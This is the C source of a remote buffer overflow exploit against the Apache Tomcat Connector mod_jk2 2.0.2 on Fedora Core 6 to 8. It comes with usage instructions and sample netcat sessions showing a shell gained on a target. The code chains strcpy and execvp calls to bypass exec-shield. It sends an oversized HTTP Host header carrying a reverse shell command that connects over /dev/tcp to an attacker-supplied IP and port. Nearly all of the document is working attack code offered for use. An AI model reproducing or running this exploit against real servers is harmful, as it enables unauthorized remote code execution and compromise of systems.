|
/*
**
** Fedora Core 6,7,8 (exec-shield) based
** Apache Tomcat Connector jk2-2.0.2(mod_jk2) remote overflow exploit
** by INetCop Security
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://www.milw0rm.com/papers/151
**
** IOActive Security Advisory:
** http://www.securityfocus.com/archive/1/487983
**
** Heretic2(heretic2x@gmail.com)'s exploit (Win32):
** http://www.milw0rm.com/exploits/5330
**
** --
** exploit by INetCop Security.
*/
/*
** --
** $ ./0x82-apache-mod_jk2 61.xx.xx.20 80 61.xx.xx.30
**
** Fedora Core release 6 (exec-shield) based
** Apache Tomcat Connector (mod_jk2) remote overflow exploit
** Target Version: Apache/2.0.53 (Unix) mod_jk2/2.0.2
** by INetCop Security
**
** + make socket
** + make exploit payload
** + try connected 61.42.25.22:80
** + exploit send!
** * attacker host, check it up, now! :-D
**
** $
** --
**
** attacker's server port 56789: --
** $ nc -l -p 56789 -vv
** listening on [any] 56789 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 47576
** id
** --
**
** attacker's server port 5678: --
** $ nc -l -p 5678 -vv
** listening on [any] 5678 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 52452
** uid=99(nobody) gid=4294967295 groups=4294967295 context=root:system_r:unconfined_t:s0-s0:c0.c1023
** --
**
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
//#include "fc6_2.0.49-2.0.2.h"
//#include "fc6_2.0.51-2.0.2.h"
//#include "fc6_2.0.52-2.0.2.h"
#include "fc6_2.0.53-2.0.2.h"
//#include "fc6_2.0.63-2.0.2.h"
//#include "f7_2.0.49-2.0.2.h"
//#include "f7_2.0.51-2.0.2.h"
//#include "f7_2.0.52-2.0.2.h"
//#include "f7_2.0.53-2.0.2.h"
//#include "f8_2.0.49-2.0.2.h"
//#include "f8_2.0.51-2.0.2.h"
//#include "f8_2.0.52-2.0.2.h"
int hex_ascii_dump(unsigned char *str);
int main(int argc,char *argv[]){
struct hostent *se;
struct sockaddr_in saddr;
unsigned char tbuf[4096+256];
unsigned char do_ex[4096];
int i,l,sock;
u_long ip,ip1,ip2,ip3,ip4;
unsigned char atk_ip[256];
char host[256];
int port=80;
printf("\n %s (exec-shield) based\n"
" Apache Tomcat Connector (mod_jk2) remote overflow exploit\n"
" Target Version: %s\n"
" by INetCop Security\n\n",OS_VERSION,TARGET_VERSION);
if(argc<4){
printf(" Usage: %s [host] [port] [attacker ip]\n",argv[0]);
printf("\n host: apache server\n");
printf(" port: apache default 80\n");
printf(" attacker ip: attacker netcat host ip\n");
printf("\n Example: %s mod_jk2.co.kr 80 82.82.82.82\n\n",argv[0]);
exit(-1);
}
port=atoi(argv[2]);
ip=ip1=ip2=ip3=ip4=0;
memset((char *)do_ex,0,sizeof(do_ex));
sscanf(argv[3],"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4);
#define IP1 16777216
#define IP2 65536
#define IP3 256
ip=0;
ip+=ip1*(IP1);
ip+=ip2*(IP2);
ip+=ip3*(IP3);
ip+=ip4;
memset((char *)atk_ip,0,sizeof(atk_ip));
sprintf(atk_ip,"%10lu",ip);
memset((char *)host,0,sizeof(host));
strncpy(host,argv[1],sizeof(host)-1);
se=gethostbyname(host);
if(se==NULL){
printf(" - gethostbyname() error\n\n");
return -1;
}
printf(" + make socket\n");
sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==-1){
printf(" - socket() error\n\n");
return -1;
}
saddr.sin_family=AF_INET;
saddr.sin_port=htons(port);
saddr.sin_addr=*((struct in_addr *)se->h_addr);
bzero(&(saddr.sin_zero),8);
printf(" + make exploit payload\n");
#define GET_METHOD "GET / HTTP/1.0\r\nHost: "
for(i=0;i<80;i++){
do_ex[i]='A';
}
#define __GOGOSSING(dest,index,src){\
*(long *)&dest[index]=src;\
index+=4;\
}
#define __GOGOSSING_GROUP(buf,index,dest,src){\
__GOGOSSING(buf,index,STRCPY_PLT);\
__GOGOSSING(buf,index,MOVE_ESP);\
__GOGOSSING(buf,index,dest);\
__GOGOSSING(buf,index,src);\
}
/* make execvp() function */
__GOGOSSING_GROUP(do_ex,i,TARGET_GOT+0,EXECVP_00_0xff);
__GOGOSSING_GROUP(do_ex,i,TARGET_GOT+1,EXECVP_08_0xff);
/* make argument */
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+0,SHELL_STR1); //s(1) ; argv[0]
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+1,SHELL_STR2); //h(1)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+2,NULL_STR); //null(1)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+3,DASH_STR); //-(1) ; argv[1]
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+4,C_OPTION); //c(1)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+5,NULL_STR); //null(1)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+6,CMD_LOC); //sh\0(2) ; argv[2]
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+8,REDIR_STR1); //<(1)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+9,SLASH_STR); ///(1)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+10,DEV_STR1); //de(2)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+12,DEV_STR2); //v(1)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+13,SLASH_STR); ///(1)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+14,TCP_STR1); //t(1)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+15,TCP_STR2); //c(1)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+16,TCP_STR3); //p(1)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+17,SLASH_STR); ///(1)
for(l=18,ip=0;ip<10;ip++,l++){ /* 10byte */
switch(atk_ip[ip]){
case '0':
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+l,NUMBER_STR);
break;
case '1':
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+l,NUMBER_STR+1);
break;
case '2':
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+l,NUMBER_STR+2);
break;
case '3':
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+l,NUMBER_STR+3);
break;
case '4':
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+l,NUMBER_STR+4);
break;
case '5':
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+l,NUMBER_STR+5);
break;
case '6':
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+l,NUMBER_STR+6);
break;
case '7':
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+l,NUMBER_STR+7);
break;
case '8':
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+l,NUMBER_STR+8);
break;
case '9':
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+l,NUMBER_STR+9);
break;
}
}
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+28,SLASH_STR); ///(1)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+29,PORT_56789_STR); //56789(5)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+34,REDIR_STR2); //>(1)
/* command make: part #2 */
__GOGOSSING_GROUP(do_ex,i,TEMP_CMD_LOC,REVERS_CMD);
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+35,TEMP_CMD_LOC); ///dev/tcp/0000000000/0000(24)
__GOGOSSING_GROUP(do_ex,i,CMD_LOC+59,NULL_STR);
/* make execvp() argv[]'s ptr */
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+0,ADDR_70); //70(1) ; argv[0] ptr
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+1,ADDR_8b); //8b(1)
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+2,ADDR_080b); //080b(2)
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+4,ADDR_73); //73(1) ; argv[1] ptr
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+5,ADDR_8b); //8b(1)
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+6,ADDR_080b); //080b(2)
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+8,ADDR_76); //76(1) ; argv[2] ptr
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+9,ADDR_8b); //8b(1)
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+10,ADDR_080b); //080b(2)
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+12,NULL_STR); //null(1) ; argv[3] ptr
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+13,NULL_STR); //null(1)
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+14,NULL_STR); //null(1)
__GOGOSSING_GROUP(do_ex,i,ARGV_LOC+15,NULL_STR); //null(1)
__GOGOSSING(do_ex,i,TARGET_PLT);
__GOGOSSING(do_ex,i,CMD_LOC);
__GOGOSSING(do_ex,i,ARGV_LOC);
l=strlen(do_ex);
for(;i<1024;i++){
do_ex[i]='A';
}
sprintf(do_ex+i,"00001111222:0000"); /* port */
i+=16;
__GOGOSSING(do_ex,i,ADD_0xA4_ESP);
memset((char *)tbuf,0,sizeof(tbuf));
sprintf(tbuf,"%s%s\r\n\r\n",GET_METHOD,do_ex);
printf(" + try connected %s:%d\n",host,port);
l=connect(sock,(struct sockaddr *)&saddr,sizeof(struct sockaddr));
if(l==-1){
printf(" - connect() error\n\n");
return -1;
}
else {
printf(" + exploit send!\n");
send(sock,tbuf,strlen(tbuf),0);
}
close(sock);
#if 1
hex_ascii_dump(tbuf);
#endif
printf(" * attacker host, check it up, now! :-D\n\n");
exit(0);
}
int hex_ascii_dump(unsigned char *str){
int i=0;
printf("\n * STRING dump: ---------------------------------\n");
for(i=0;i<strlen(str);i++){
if(i%32==0)
printf(" %06d ",i);
if(isprint(str[i]))
printf("%c",str[i]);
else printf(".");
if(i%32-31==0){
printf("\n");
}
}
printf("\n * HEX dump: ------------------------------------\n");
for(i=0;i<strlen(str);i++){
if(i%16==0)
printf(" %06d ",i);
if(i%2==1)
printf("%02x ",str[i]);
else printf("%02x",str[i]);
if(i%16-15==0){
printf("\n");
}
}
printf("\n ------------------------------------------------\n\n");
}
/* eoc */
|
推荐
评论(0条)
